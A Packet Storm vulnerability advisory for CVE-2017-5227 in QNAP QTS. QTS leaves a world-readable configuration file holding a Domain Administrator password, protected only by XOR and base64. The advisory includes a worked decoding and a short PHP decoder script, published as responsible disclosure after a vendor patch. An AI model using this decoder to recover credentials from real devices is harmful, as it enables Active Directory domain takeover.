exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

QNAP QTS Privilege Escalation / Information Disclosure

QNAP QTS Privilege Escalation / Information Disclosure
Posted Mar 23, 2017
Authored by Pasquale Florillo, Guido Oricchio

QNAP QTS versions prior to 4.2.4 suffer from a sensitive data exposure vulnerability that allows for privilege escalation.

tags | exploit
advisories | CVE-2017-5227
SHA-256 | 3d248b7122dde92c3c6cff49c15a639517a9a2504a008042fa15212812bc6b27

QNAP QTS Privilege Escalation / Information Disclosure

Change Mirror Download
QNAP QTS Domain Privilege Escalation Vulnerability

Name Sensitive Data Exposure in QNAP QTS
Systems Affected QNAP QTS (NAS) all model and all versions < 4.2.4
Severity High 7.9/10
Impact CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
Vendor http://www.qnap.com/
Advisory http://www.ush.it/team/ush/hack-qnap/qnap.txt
Authors Pasquale "sid" Fiorillo (sid AT ush DOT it)
Guido "go" Oricchio (g.oricchio AT pcego DOT com)
Date 20170322


QNAP Systems, founded in 2004, provides network attached storage (NAS)
and network video recorder (NVR) solutions for home and business use to
the global market.
QNAP also delivers a cloud service, called myQNAPcloud, that allows
users to access and manage the devices from anywhere.
QTS is a QNAP devices proprietary firmware based on Linux.

ISGroup (http://www.isgroup.biz/) is an Italian Information Security
boutique, we found this 0day issue while supporting Guido Oricchio
of PCego, a System Integrator, to secure a QNAP product for one of his

Responsible disclosure with Qnap: we contacted qnap on public security@
contact and we escalate fast to their Security Researcher Myron Su on
PGP emails.

Prior vulnerabilities in QNAP:

Information to customers of the vulnerability is shown in their bulletin
ID NAS-201703-21 (https://www.qnap.com/en/support/con_show.php?cid=113):
QTS 4.2.4 Build 20170313 includes security fixes for the following
vulnerabilities: Configuration file vulnerability (CVE-2017-5227)
reported by Pasquale Fiorillo of the cyber security company ISGroup
(www.isgroup.biz), a cyber security company, and Guido Oricchio of
PCego (www.pcego.com), a system integrator.

The latest version of the software at the time of writing can be
obtained from:



The vulnerability allows a local QTS admin user, or other low privileged
user, to access configuration file that includes a bad crypted Microsoft
Domain Administrator password if the NAS was joined to a Microsoft
Active Directory domain.

The affected component is the "uLinux.conf" configuration file,
created with a world-readable permission used to store a Domain
Administrator password.

Admin user can access the file using ssh that is enabled by default.
Other users are not allowed to login, so they have to exploit a
component, such as a web application, to run arbitrary command or
arbitrary file read.

TLDR: Anyone is able to read uLinux.conf file, world readable by
default, can escalate to Domain Administrator if a NAS is a domain


QNAP QTS stores "uLinux.conf" configuration file in a directory
accessible by "nobody" and with permission that make them readable by

If the NAS was joined to an Active Directory, such file contain a Domain
Administrator user and password in an easily decrypt format.

In older versions of QTS the Domain Admin's password was stored in

A) Config file readable by "nobody"

[~] # ls -l /etc/config/uLinux.conf
-rw-r--r-- 1 admin administ 7312 Dec 10 06:39 /etc/config/uLinux.conf

Our evidence is for QTS 4.2.0 and QTS 4.2.2 running on a TS-451U,
TS-469L, and TS-221. Access to the needed file are guaranteed to
all the local users, such as httpdusr used to running web sites and
web application hosted on the NAS.

This expose all the information contained in the configuration file at
risk and this is a violation of the principle of least privilege.


B) Weak encrypted password in the configuration file

The Microsoft Active Directory Admin username and password are stored
in the file obfuscated by a simple XOR cypher and base64 encoded.

In this scenario, a Local File Read vulnerability could lead to full
domain compromise given the fact that an attacker can re-use such
credentials to authenticate against a Domain Controller with maximum

The password field in the uLinux.conf has the following format:

User = <username>
Password = <base64>

User = Administrator

The "<base64>" decoded is:

sid@zen:~$echo -n "AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==" | base64 -d | hexdump -C
00000000 03 03 00 00 01 01 06 06 07 07 04 04 23 23 20 20 |............## |
00000010 21 21 26 26 27 27 24 24 43 |!!&&''$$C|

Each byte xored with \x62 is the hex ascii code of the plaintext char.
\x03 ^ \x62 = \x61 (a)
\x00 ^ \x62 = \x61 (b)
\x24 ^ \x62 = \x46 (F)
\x43 ^ \x62 = \x21 (!)

The plaintext password is: aabbccddeeffAABBCCDDEEFF!


The following code can be used to decode the password:

$plaintext = str_split(base64_decode($argv[1]));
foreach($plaintext as $chr) {
echo chr(ord($chr)^0x62);
echo "\n";

Eg: sid@zen:~$ ./decode.php AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==

Vendor released QTS 4.2.4 Build 20170313 that contains the proper
security patch. At the time of this writing an official patch is
currently available.


Mitre assigned the CVE-2017-5227 for this vulnerability, internally to
Qnap it's referred as Case NAS-201703-21.


20161212 Bug discovered
20170106 Request for CVE to Mitre
20170106 Disclosure to security@qnap.com
20170107 Escalation to Myron Su, Security Researcher from QNAP (fast!)
20170107 Details disclosure to Myron Su
20170109 Got CVE-2017-5227 from cve-assign
20170110 Myron Su confirm the vulnerability
20170203 We asks for updates, no release date from vendor
20170215 We extend the disclosure date as 28 Feb will not be met
20170321 QNAP releases the QTS 4.2.4 Build 20170313
20170322 Advisory disclosed to the public


[1] Top 10 2013-A6-Sensitive Data Exposure

[2] Access Control Cheat Sheet

[3] https://forum.qnap.com/viewtopic.php?t=68317
20121213 User reporting that the password was stored in plaintext in
a world-readable file

[4] https://www.qnap.com/en/support/con_show.php?cid=113
Qnap Security Bullettin NAS-201703-21


Pasquale "sid" Fiorillo and Guido "go" Oricchio are credited with the
discovery of this vulnerability.

Pasquale "sid" Fiorillo
web site: http://www.pasqualefiorillo.it/
mail: sid AT ush DOT it

Guido "go" Oricchio
web site: http://www.pcego.com/
mail: g.oricchio AT pcego DOT com


Copyright (c) 2017 Pasquale "sid" Fiorillo

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

Login or Register to add favorites

File Archive:

June 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    18 Files
  • 2
    Jun 2nd
    13 Files
  • 3
    Jun 3rd
    0 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    0 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By